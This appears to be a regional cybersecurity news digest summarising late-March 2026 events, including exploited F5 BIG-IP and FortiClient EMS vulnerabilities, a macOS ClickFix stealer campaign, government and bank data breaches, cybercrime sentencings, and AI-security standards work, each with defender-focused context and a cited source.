[AMER] CISA’s Known Exploited Vulnerabilities catalog flagged the F5 BIG-IP flaw CVE-2025-53521 on 2026-03-27, and follow-on reporting on 2026-03-30 said the bug has been reclassified from denial-of-service to remote code execution and is being exploited in the wild. For responders, that combination means exposure triage should include internet-facing BIG-IP estates, log review for post-exploitation behavior, and validation that older risk assumptions are no longer sufficient for containment planning (Source: SecurityWeek, 30-03-2026).

No additional credible updates in the last 72h.

[AMER] The FBI confirmed on 2026-03-29 that Iranian-linked actors breached FBI Director Kash Patel’s personal email account, with published material reportedly dating from earlier years and not containing government information. Investigators and executive-protection teams should read the case as another reminder that personal accounts, archival data, and reputational targeting remain live attack surfaces even when an adversary does not reach official systems (Source: BleepingComputer, 29-03-2026).

No additional credible updates in the last 72h.

[EMEA] The European Commission confirmed on 2026-03-30 that the March 24 attack on infrastructure supporting the Europa web platform led to a data breach, after earlier statements on 2026-03-27 said the incident had been contained and internal systems were not impacted. This matters because public-sector cloud spillover remains a live operational risk for multi-site web estates, and defenders should expect renewed focus on segmentation, account scoping, and forensic preservation in shared hosting environments (Source: BleepingComputer, 30-03-2026).

[EMEA] Reuters reported on 2026-03-27 that nearly 448,000 Lloyds Banking Group customers were affected by an IT glitch that exposed transaction data and some personal details to other users during a March incident in the UK. Even though the event was described as a glitch rather than a confirmed intrusion, it still shows why cyber and resilience teams must treat access-control failures, data segregation errors, and customer-facing misrouting as incident-response events with regulatory consequences (Source: Reuters, 27-03-2026).

[AMER] SecurityWeek reported on 2026-03-30 that attackers are exploiting CVE-2025-53521 in F5 BIG-IP after the flaw was upgraded to critical remote code execution severity, with CISA having already pushed the issue into its KEV workflow on 2026-03-27. The shift from what many defenders understood as a denial-of-service problem to an RCE changes patch urgency, hunt priorities, and edge-device monitoring requirements for organizations that rely on BIG-IP in front of core applications (Source: SecurityWeek, 30-03-2026).

[AMER] BleepingComputer reported on 2026-03-30 that a critical Fortinet FortiClient EMS SQL injection flaw, tracked as CVE-2026-21643, is now being actively exploited and can allow unauthenticated command or code execution through the management interface. For blue teams, the risk is especially acute because compromised endpoint-management infrastructure can become a force multiplier for laterally spreading malware, pushing malicious policy changes, or suppressing remediation visibility across fleets (Source: BleepingComputer, 30-03-2026).

[AMER] SecurityWeek and BleepingComputer both highlighted on 2026-03-28 a Cloudflare-themed ClickFix campaign delivering the Python-based Infiniti Stealer to macOS users through fake human-verification prompts, Bash execution, and a Nuitka-packed payload. The campaign matters because it blends social engineering with cross-platform tradecraft that can slip past traditional assumptions about macOS safety, making user-awareness tuning and script-execution telemetry newly important for enterprise detections (Source: SecurityWeek, 28-03-2026).

[AMER] The U.S. Department of Justice said on 2026-03-27 that an extradited Kenyan national was sentenced for his role in a business email compromise conspiracy that used forged invoices, contracts, and wire instructions to drive more than $12 million in losses. The case matters operationally because it shows prosecutors continuing to prioritize financially motivated cyber-enabled fraud chains that mix account compromise, social engineering, and mule infrastructure rather than ransomware alone (Source: U.S. Department of Justice, 27-03-2026).

[AMER] DOJ listings published in late March 2026 show a Russian citizen was sentenced on 2026-03-23 for hacking U.S. companies and enabling major cybercrime groups that extorted tens of millions of dollars from victims. For defenders, the sentencing underscores how access brokers, botnet operators, and ransomware affiliates remain tightly linked in the criminal ecosystem, which is useful context when attributing intrusion stages and prioritizing intelligence-sharing with law enforcement (Source: U.S. Department of Justice CCIPS, 23-03-2026).

[EMEA] The UK National Crime Agency launched its National Strategic Assessment 2026 on 2026-03-28 and warned that the boundaries between crime types are blurring, including the radicalization of teenagers into cybercrime and other digitally enabled offending. The policy signal for DFIR leaders is that cyber defense can no longer be separated cleanly from fraud, safeguarding, and serious organized crime strategy, especially when prevention and disruption depend on earlier intervention (Source: NCA, 28-03-2026).

[EMEA] Reuters reported on 2026-03-26 that the UK sanctioned operators linked to a major Cambodia-based scam compound and the Xinbi crypto marketplace, targeting infrastructure allegedly used for online fraud and stolen-data trading. That matters for cyber professionals because sanctions policy is increasingly being used to pressure the enabling layers behind fraud ecosystems, affecting threat-finance tracing, vendor screening, exchange exposure, and cross-border cooperation strategies (Source: Reuters, 26-03-2026).

[EMEA] ETSI materials published during the week ending 2026-03-27 show continued movement on cybersecurity standardization, including a newly published quantum-safe work item and fresh visibility into the Securing Artificial Intelligence track. For compliance teams, the important takeaway is that AI-security and crypto-agility requirements are converging toward more explicit, auditable expectations, which will influence procurement language and technical-control baselines well before regulations formally bite (Source: ETSI, 27-03-2026).

[AMER] NIST’s Center for AI Standards and Innovation announced on 2026-03-27 a CRADA with OpenMined to enable secure AI evaluations, extending the standards-and-assurance conversation beyond model performance into safer testing environments. While not a compliance rule by itself, it is a practical marker that evaluation integrity, data handling, and reproducible security testing are becoming central expectations in AI governance and third-party assurance programs (Source: NIST, 27-03-2026).

[EMEA] Reuters’ 2026-03-27 report on the Lloyds customer-data exposure remains the most credible consumer-facing digital privacy event in this cycle, with no second comparable app-specific leak verified across major sources inside the fallback window. For practitioners, the episode still reinforces that front-end product defects can create breach-like outcomes for large user populations and should be folded into privacy-by-design reviews and incident playbooks (Source: Reuters, 27-03-2026).

No additional credible updates in the last 72h.